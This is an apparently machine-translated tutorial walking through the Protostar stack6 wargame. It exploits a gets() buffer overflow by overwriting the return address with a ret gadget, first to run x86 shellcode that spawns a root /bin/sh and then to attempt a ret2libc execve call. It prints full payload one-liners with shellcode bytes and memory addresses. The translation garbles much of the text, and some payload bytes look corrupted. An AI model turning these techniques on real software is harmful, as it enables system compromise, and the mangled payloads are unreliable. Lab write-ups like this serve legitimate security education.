Stack Overflow attacks using ROP in Linux

Protostar stack6 is used to demonstrate the simple use of ROP in Linux. ROP is the so-called Return Orientated Programming, which was also called ret2libc in the early days. For the introduction of ROP, see the early article 《CVE2012-1889 Exploit writing (III)The idea is the same, but the platform is changed to Linux.0 × 01. _ builtin_return_address FunctionFirst, we will introduce the _ builtin_return_address function, which receives a parameter, which can be 0, 1, 2, and so on. _ Builtin_return_address (0) returns the return address of the current function. If the parameter is increased by 1, the return address is obtained from the previous layer. There seems to be a similar function in Windows, but the specific name is forgotten. Let's look at an example to find out the usefulness of this function:

#include <stdio.h>#include <string.h>#include <stdlib.h>#include <unistd.h>void foo(){printf("in foo()\n");printf("Foo: __builtin_return_address(0) = 0x%08X\n",__builtin_return_address(0));printf("Foo: __builtin_return_address(1) = 0x%08X\n",__builtin_return_address(1));bar();}void bar(){printf("in bar()\n");printf("Bar: __builtin_return_address(0) = 0x%08X\n",__builtin_return_address(0));printf("Bar: __builtin_return_address(1) = 0x%08X\n",__builtin_return_address(1));}int main(int argc, char **argv){foo();return 0;}

Use gdb for debugging after compilation, as shown in the following figure: Call _ builtin_return_address (1) In foo to obtain the return address after the main function is executed. 0 × 02. execute Shellcode directly on the stackThe source code of the question is as follows:

#include <stdlib.h>#include <unistd.h>#include <stdio.h>#include <string.h>void getpath(){    char buffer[64];    unsigned int ret;    printf("input path please: "); fflush(stdout);    gets(buffer);    ret = __builtin_return_address(0);    if((ret & 0xbf000000) == 0xbf000000) {        printf("bzzzt (%p)\n", ret);        _exit(1);    }    printf("got path %s\n", buffer);}int main(int argc, char **argv){    getpath();}

 

It can be seen that the buffer can overflow, but there is a check for the returned address, that is, the highest bit cannot be 0xBF, and the highest bit of the stack address is 0xBF, therefore, we cannot directly jump to the stack to execute Shellcode, but we can use. A ret command in text as a jump. First, you must test that the overwrite field of the returned address is located in the input data: python-c "print 'A' * 80 + 'B' * 4"> data.txt gdb stack6disas getpathb * 0x080484b8 # Here, the return address is put in eax r <data.txt info registers eax to see eax is 0x42424242, that is, the returned address is overwritten with 0x42424242. Now we need a ret command. We can directly obtain the last command of the main function. Through disas main, we can see that the address is 0 × 08048508. If we overwrite the returned address to 0x08048508, the address 0x08048508 will be executed after the getpath returns, and here is a return address, then we can place an address pointing to Shellcode on the stack. Now you need to know the buffer address. At the gets call point, the breakpoint is disas getpathb * 0x080484aa # Call getsinfo registers eax here to get the buffer address 0 xBFFFFCCC. The starting address of the buffer is known, so we can know the Shellcode location: 0 xBFFFFCCC + 80 + 4 + 4 = 0xBFFFFD24. The following figure shows the data layout: Use Python to generate this data and use it as the input data of the stack6 program: python-c "print 'A' * 80 + '\ x08 \ x85 \ x04 \ x08' + '\ x24 \ xFD \ xFF \ xBF' + '\ x31 \ xc0 \ x31 \ xdb \ xb0 \ x06 \ xcd \ x80 \ x53 \ x68/tty \ x68/dev \ x89 \ xe3 \ x31 \ xc9 \ x66 \ xb9 \ x12 \ x27 \ xb0 \ x05 \ xcd \ x80 \ x31 \ xc0 \ x50 \ x68 // sh \ x68/bin \ x89 \ xe3 \ x50 \ x53 \ x89 \ xe1 \ x99 \ xb0 \ x0b \ xcd \ 8080' "> data.txt gdb stack6r <data.txt whoamiroot0 × 03. the method for redirecting to the last ret command of the main function using the ROP technology actually uses the idea of the ROP. However, if the stack has no executable attribute Method will not work. We can consider using execve ("/bin/sh", 0, 0) to execute shell. To solve this problem, you must first find the execve address. Run the following command in gdb: print execve # Is 0xb7f2e170print exit # Is 0xb7ec60c0, and search for/bin/sh strings through x/1000 s $ esp, find the string "SHELL =/bin/bash" in 0xbffffefb. The address we need is 0 xbffffefb + 6 = 0xBFFFFF01. Of course, you can also directly input a string when entering the string, but you need to control the string Terminator, and gets cannot read it (read 0x0 d, not 0x00), which is very troublesome for additional processing. The above search method is to find the environment variable string in the process. At the same time, we can also find a pointer pointing to 0x00000000, such as 0xbffd6a. It is also possible to input such a pointer to the second and third parameters of execve. The data layout is as follows:


After execve is called, it will not be returned. Therefore, the filled exit address can also be other data without NULL. As far as I think, this will be done later. Python-c "print 'A' * 80 + '\ x08 \ x85 \ x04 \ x08' + '\ xE1 \ xF2 \ xB7' + '\ xC0 \ x60 \ xEC \ xB7 '+' \ x01 \ xFF \ xBF '+' \ x6A \ xFD \ xFF \ xBF '+' \ x6A \ xFD \ xFF \ xBF '"> data.txt gdb stack6r <data.txt, but we can see it in gdb, /bin/bash exits immediately after execution. This estimation is incorrect when execve is used. The idea of ROP is correct. Next time we analyze the Shellcode in the first method, you will know how to use it. 0 × 04. gdb debugging LearningDisassemble Data in the specified region: disas/r 0x0804a000 0x0804b000 view function address: print execve modify memory data: set * (char *) 0x0804aabb = 0 × 00 select the corresponding type to use the file data as the input: run <the file path uses the shell command output as the command line parameter: run $ (python-c "print 'a * 100") Source URL: http://www.programlife.net/linux-rop-stack-overflow.html